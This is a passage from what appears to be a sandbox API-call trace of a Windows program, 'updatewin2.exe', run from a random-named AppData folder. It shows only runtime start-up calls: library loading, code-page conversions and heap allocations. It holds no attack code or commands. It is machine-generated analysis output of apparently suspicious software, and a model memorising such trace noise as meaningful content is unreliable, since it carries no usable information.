(hModule=0x76c20000, lpProcName="SetLastError") returned 0x76c311a9 [0044.548] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0044.548] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0044.548] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0044.548] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0044.548] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0044.548] GetProcAddress (hModule=0x76c20000, lpProcName="TlsAlloc") returned 0x76c349ad [0044.548] GetProcAddress (hModule=0x76c20000, lpProcName="TlsGetValue") returned 0x76c311e0 [0044.548] GetProcAddress (hModule=0x76c20000, lpProcName="TlsSetValue") returned 0x76c314fb [0044.548] GetProcAddress (hModule=0x76c20000, lpProcName="TlsFree") returned 0x76c33587 [0044.548] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibrary") returned 0x76c334c8 [0044.548] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0044.548] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryExW") returned 0x76c3495d [0044.548] GetProcAddress (hModule=0x76c20000, lpProcName="GetStdHandle") returned 0x76c351b3 [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleExW") returned 0x76c34a6f [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="GetACP") returned 0x76c3179c [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileExW") returned 0x76c41811 [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidCodePage") returned 0x76c34493 [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="GetOEMCP") returned 0x76c5d1a1 [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="GetCPInfo") returned 0x76c35189 [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineA") returned 0x76c351a1 [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineW") returned 0x76c35223 [0044.549] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0044.549] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0044.550] GetProcAddress (hModule=0x74f40000, lpProcName="MessageBoxA") returned 0x74fafd1e [0044.550] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75fd0000 [0044.550] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0044.550] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75340000 [0044.550] GetProcAddress (hModule=0x75340000, lpProcName="PathAppendW") returned 0x753581ef [0044.550] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x749c0000 [0044.553] GetProcAddress (hModule=0x749c0000, lpProcName="atexit") returned 0x749dc544 [0044.553] atexit (param_1=0x4e63d8) returned 0 [0044.554] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5f4 | out: lpSystemTimeAsFileTime=0x18f5f4*(dwLowDateTime=0x18e962b0, dwHighDateTime=0x1d5956a)) [0044.554] GetCurrentThreadId () returned 0x9f8 [0044.554] GetCurrentProcessId () returned 0x9f4 [0044.554] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5ec | out: lpPerformanceCount=0x18f5ec*=16472895343) returned 1 [0044.566] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0044.567] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.567] GetLastError () returned 0x57 [0044.568] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.568] GetLastError () returned 0x57 [0044.568] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76c20000 [0044.568] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0044.568] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.568] GetLastError () returned 0x57 [0044.568] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0044.569] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0044.570] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.570] GetLastError () returned 0x57 [0044.570] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.570] GetLastError () returned 0x57 [0044.570] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76c20000 [0044.570] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0044.571] GetProcessHeap () returned 0x4d0000 [0044.571] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.571] GetLastError () returned 0x57 [0044.571] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0044.571] GetLastError () returned 0x57 [0044.571] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0044.571] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x364) returned 0x4fad00 [0044.572] SetLastError (dwErrCode=0x57) [0044.572] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xc00) returned 0x4fb070 [0044.573] GetStartupInfoW (in: lpStartupInfo=0x18f528 | out: lpStartupInfo=0x18f528*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033e0, hStdOutput=0xccb936b6, hStdError=0xfffffffe)) [0044.573] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0044.573] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0044.573] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0044.573] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe\" " [0044.573] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe\" " [0044.573] IsValidCodePage (CodePage=0x4e4) returned 1 [0044.573] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f548 | out: lpCPInfo=0x18f548) returned 1 [0044.573] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ee10 | out: lpCPInfo=0x18ee10) returned 1 [0044.573] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0044.573] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eba8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0044.573] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x18ee24 | out: lpCharType=0x18ee24) returned 1 [0044.574] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0044.574] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eb58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0044.574] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.574] GetLastError () returned 0x57 [0044.574] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1 [0044.574] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0044.574] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e948, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0044.574] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f324, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿn\x98àÌ`õ\x18", lpUsedDefaultChar=0x0) returned 256 [0044.575] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0044.575] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eb78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0044.575] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0044.575] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x18e968, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0044.575] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f224, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿn\x98àÌ`õ\x18", lpUsedDefaultChar=0x0) returned 256 [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x80) returned 0x4fa3e8 [0044.575] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x417ca8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe")) returned 0x5f [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xc8) returned 0x4fc478 [0044.575] RtlInitializeSListHead (in: ListHead=0x417bc8 | out: ListHead=0x417bc8) [0044.575] GetLastError () returned 0x0 [0044.575] GetEnvironmentStringsW () returned 0x4fc548* [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xaca) returned 0x4fd020 [0044.575] FreeEnvironmentStringsW (penv=0x4fc548) returned 1 [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x98) returned 0x4fc548 [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3e) returned 0x4fdb10 [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x6c) returned 0x4fc5e8 [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x6e) returned 0x4fc660 [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x78) returned 0x4e1180 [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x62) returned 0x4fc6d8 [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2e) returned 0x4e52d0 [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x48) returned 0x4fc748 [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x28) returned 0x4fa470 [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1a) returned 0x4fc028 [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x4a) returned 0x4fc798 [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x72) returned 0x4e1200 [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x30) returned 0x4e5308 [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2e) returned 0x4e5340 [0044.575] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1c) returned 0x4fc050 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xd2) returned 0x4fc7f0 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x7c) returned 0x4fc8d0 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x36) returned 0x4fc958 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3a) returned 0x4fdb58 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x90) returned 0x4fc998 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x24) returned 0x4fca30 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x30) returned 0x4e5378 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x36) returned 0x4fca60 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x48) returned 0x4fcaa0 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x52) returned 0x4fcaf0 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3c) returned 0x4fdba0 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x82) returned 0x4fcb50 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2e) returned 0x4e53b0 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1e) returned 0x4fc078 [0044.576] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2c) returned 0x4e53e8 [0044.576] RtlAllocateHeap 